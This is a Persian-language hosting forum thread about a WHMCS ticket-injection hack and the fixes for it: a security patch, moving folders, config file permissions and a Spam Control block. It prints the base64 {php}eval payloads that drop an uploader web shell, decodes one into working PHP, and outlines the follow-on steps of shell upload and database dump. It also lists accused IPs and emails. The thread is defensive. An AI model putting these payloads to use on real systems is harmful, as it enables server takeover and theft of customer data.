خیر ...نقل قول:
نوشته اصلی توسط mehrshad.ho
در ضمن بچه ها هاست بیل خیلی قوی تر و گرافیت عالی شده !
تازه لیسانس ماهانش شده 5.95$ اصلا باور نکردنی است !
یکی پیدا بشه ماژول براش بنویسه من اولین کسی هستم که می خرم ...
نمایش نسخه قابل چاپ
خیر ...نقل قول:
نوشته اصلی توسط mehrshad.ho
در ضمن بچه ها هاست بیل خیلی قوی تر و گرافیت عالی شده !
تازه لیسانس ماهانش شده 5.95$ اصلا باور نکردنی است !
یکی پیدا بشه ماژول براش بنویسه من اولین کسی هستم که می خرم ...
[QUOTE=NovinServer;333827]خیر ...
QUOTE]
میشه بگی دیگه باید چی کار کرد ؟
دیگه تاپیکو ادامه ندین این کارارو انجام بدین حله
توجه کنید پچ رو علاوه بر جایی که whmcs را نصب کردید داخل پوشه incloud هم قرار بدید
و دوم انتقال سه پوشه به قبل از روت
ولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید.
من این کار هارو انجام دادم درسته ؟
دسترسی فایل configuration.php v کردم 444 و بعد کد زیر رو گذاشتم توش
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
یوزر نیم سایت هم وارد کردم
3 پوشه هم بردم قبل public_html
درسته ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
---------- Post added at 11:37 PM ---------- Previous post was at 11:35 PM ----------
الان سایتم ترکید که
حتما اشتباه انجام دادی
میدونم اشکالت کجاست
باید اون کد هارو داخل فایل کانفیگ و قبل از
<؟
بذاری
احتمالا شما بعد از این گذاشتی
کد هارو توی configuration.php
و بعد از آخرین خط گذاشته بودم
قبل از <? بذار
---------- Post added at 11:49 PM ---------- Previous post was at 11:46 PM ----------
این جوری باید بشه
کانفیگت
کد PHP:<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
دستت درد نکنه
دیگه خیالت راحت بذار تا صبح بهت تیکت بزنن
خودتم به خودت هی تیکت بزن اگه حوصلت سر رفت
فقط بشین آیپی هکر جمع کن و بخند
سلام.
دوستان خواهشمند است هرگونه آی پی و یا ایمیل که قصد سو استفاده را دارد بیان فرمایید تا اقدام لازم صورت گیرد.(از تمامی دوستان این خواسته را داریم)
باتشکر.
مگه یکی دو تا آیپیه؟
بعد خداتا وی فیی ان ریخته هر کی با اون میزنه
علاوه بر کارایی که من گفتم یه پیشنهاد دیگه اینه که از قسمت Spam Control در مدیریت whmcs این دو کد هک رو مسدود کنید
به همین راحتی
حتی کلمه ی php ببندین تا داخل سابجکت اجازه استفاده نداشته باشه
اگر شما و سایر دوستان آی پی را محبت کنید هرچند ۱ یا ۲ و یا ۱۰۰ عدد باشد خود به ما کمک خواهد کرد.نقل قول:
نوشته اصلی توسط maryam1
ضمنا اگر می شود یک بار آموزش کامل جلوگیری را مجددا در یک پست مجزا بفرمایید تا ما و دوستان بهره ببریم(اینگونه که هرکس یک چیز می گوید موجب گمراهی خواهد شد. اگر جامع و کامل باشد بسیار مناسب است)
همکاران لطفا آی پی ها و ایمیل هارو اعلام کنند دوستانی قصد حرکت دسته جمعه به سمت دادسرای جرائم رو دارند
به خدا بار ها این کارو کردم اما الان کامل مینویسم (فقط تشکر فراموش نشه)
اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید
به جای username نام کاربری یوزر سیپنل رو بنویسیدکد PHP:<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
وکد PHP:{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
را بلوک کنیدکد PHP:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444
فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید
لطفا دیگه اسپم ندید تا این آموزش بمونه
اینم آیپی و ایمیل خرابکاران بعضی هاشون البته
31.7.61.22
46.19.139.252
takfile22@yahoo.com
188.158.211.136
سلام دوستان.
با کمک شرکت فراسو آی پی حمله کننده به ما نیز یافت شد: 188.138.100.80
طبق http://whois.domaintools.com/188.138.100.80، دامنه irrapid.com برای شخص هکر می باشد.
بزودی مراحل شکایت طی خواهد شد.
موفق باشید.
مطمئنی ؟!نقل قول:
نوشته اصلی توسط MbjHosting
بعید میدونم . یه پیگیری دقیق تر از صاحب آی پی یا دامنه داشته باشید
چی بگم والا این قضیه هک شدنها خیلی دردسر ساز شده برای خیلی از هاستینگ ها
به نظرم برید تو پیام خصوصی بریزید رو سرو کله ی هم
نه پست هاتون به عنوان تاپیک میخوره نه چیز دیگه
ببینم دعواتون به کجا میرسه
:109:هر تاپیکی سر میزنی توش یکی با اونیکی داره دعوا میکنه!!8-}
هاستینگ در این جد شغل جنجالی هست؟:d
برای ما هم امروز از آی پی 173.236.125.246 تیکت زدند اما بدلیل نصب پچ مربوطه هیچ صدمه ای ندیدیم
از این آی پی هم با ما
178.168.5.5
این تاپیک هم شده، محلی برای یادگیری یک سری بچه که برن مثلا سایتها رو هک کنن!!!!
ولی سرشون به سنگ میخوره =))
زیاد خودتو ناراحت نکن! اگر شما که دم از شکایت و دادسرا میزنین 2000 ای پی هم بهتون بدن اخرش باید تو همین تاپیک دنبال path باشید :ینقل قول:
نوشته اصلی توسط mehrshad.ho
سلام
دوستان دیروز هم رو سایت ما همچین تیکتی زده بودن ، من هم تیکت و هم یوزر رو حذف کردم ، وقت نکردم این 15 صفحه تاپیک رو دنبال کنم ، سایت ما هیچ تغییری توش داده نشده ! ، این هک دقیقا چیکار میکنه سایت رو چه دسترسی پیدا میکنه هکر؟ و اینکه الان من چیکار کنم 8-}
آی پی طرف 31.7.61.22
ایمیلی هم که ثبت کرده بود 4scriptman@gmail.com که متاسفانه وقتی سرچ میکنی تو گوگل به همین فروم هدایت میشی!! (لطفا مدیران این مورد رو یه پیگیری بکنن)
ما که مشکلی پیدا نکردیم
دوستان
دوستانی که dedicated از سوئیس میدنکد:92.50.50.132 2011/12/08 01:27
2.176.235.160 2011/12/07 11:39
31.7.61.22 2011/12/10 12:25
31.7.61.22
رو حتما پیگیری کنید.
سلام.نقل قول:
نوشته اصلی توسط HyperServer
درست می فرمایید این آی پی زیاد بدنبال خرابکاری بوده است !
ما پیگیری کردیم ولی برای مشتریان سرور سوئیس ما نبود.
موفق باشید.
به دلیل اسپم بازار شدن اینجا یه تاپیک جدید باز کردم لطفا اونجا هیچ پستی ندیدکد PHP:سلام
دوستان دیروز هم رو سایت ما همچین تیکتی زده بودن ، من هم تیکت و هم یوزر رو حذف کردم ، وقت نکردم این 15 صفحه تاپیک رو دنبال کنم ، سایت ما هیچ تغییری توش داده نشده ! ، این هک دقیقا چیکار میکنه سایت رو چه دسترسی پیدا میکنه هکر؟ و اینکه الان من چیکار کنم
آی پی طرف 31.7.61.22
ایمیلی هم که ثبت کرده بود 4scriptman@gmail.com که متاسفانه وقتی سرچ میکنی تو گوگل به همین فروم هدایت میشی!! (لطفا مدیران این مورد رو یه پیگیری بکنن)
http://www.webhostingtalk.ir/f178/36259/#post334440
تایید میشهنقل قول:
نوشته اصلی توسط MbjHosting
دوستان سوالی دارم
اگر روی اون تیکت کلیک نشه مشکلی پیش نمیاد؟
متاسفانه من کلیک کردم و بعداً دیدم کل فایل sql سایت توی downloads ایجاد شده
این نشون میده با کلیک من روی اون تیکت این اتفاق افتاده؟ یا نه موقع آپلود b0x.php همون موقع هکر این رو گرفته؟
این احتمال هست که این کد ایمیل کرده باشه کل فایل sql رو؟! :(
چه داستانی شده خیلی ناراحتم
تمام پسوردهارو عوض کنید سریع
این فایل
b0x رو حذف کنید
بعد مثل آموزش زیر عمل کنید
http://www.webhostingtalk.ir/f178/36259/#post334440
خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن
سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده
جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!
ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)
الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست
این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم
فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید
از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر د ز د رو بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد
حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!
فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید
همچنین منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...
و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!
همینطور اگر چند سیستم WHMCS دارین همشونو آپدیت کنید
با آپدیت جدید میگه hacking attempt! و مشکل حل میشه!
و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست
امیدوارم مطالب عنوان شده برای دوستان مفید واقع شده باشه
نقل قول:
نوشته اصلی توسط dm800pvr
سلام تیبل های دیتا بیس را هم اموزش میدادید که ملت کارشون برای هک و ***ی اطلاعات کاربران را حت تر باشه :39:
این تاپیک لعنتی نقش مهمی تویه این هک ها داشت و اینا یک مشت جوجه هکرند وگرنه اصلا نیازی به اپلود شل نیست راه های راحت تری هم هست
سلام
دوستان حتما Patch امنیتی را اعمال کنند
من چند وقت پیش از طرف یک از تیم های هک ایرانی سایتم هک شد
که تمام اطلاعات سایت را حذف و مجدد آپلود کردم و patch را نصب کردم وتمام موارد امنیتی هم رعایت کردم تا حالا هم هیچ مشکلی نداشتم
با رعایت موارد امنیتی می توانید جلو هک را بگیرید
تایپیک مفید
آموزش رفع مشکل امنیتی whmcs
در ضمن ایمیل و هم چنین ip هکر را در این تایپیک اعلام کنید
آی پی من کسی که به من حمله کرد
188.50.52.64
---------- Post added at 06:50 PM ---------- Previous post was at 06:41 PM ----------
یه بار دیکد می شه ایننقل قول:
نوشته اصلی توسط maryam1
توی این یه کد شده هست که دیکدش می شهکد PHP:$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("kir.php","w");
fwrite($fo,$code);
کد PHP:<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
تاپیک قفل شد
فکر کنم همه فهمیدن ، دیگه نیازی به ادامه نیست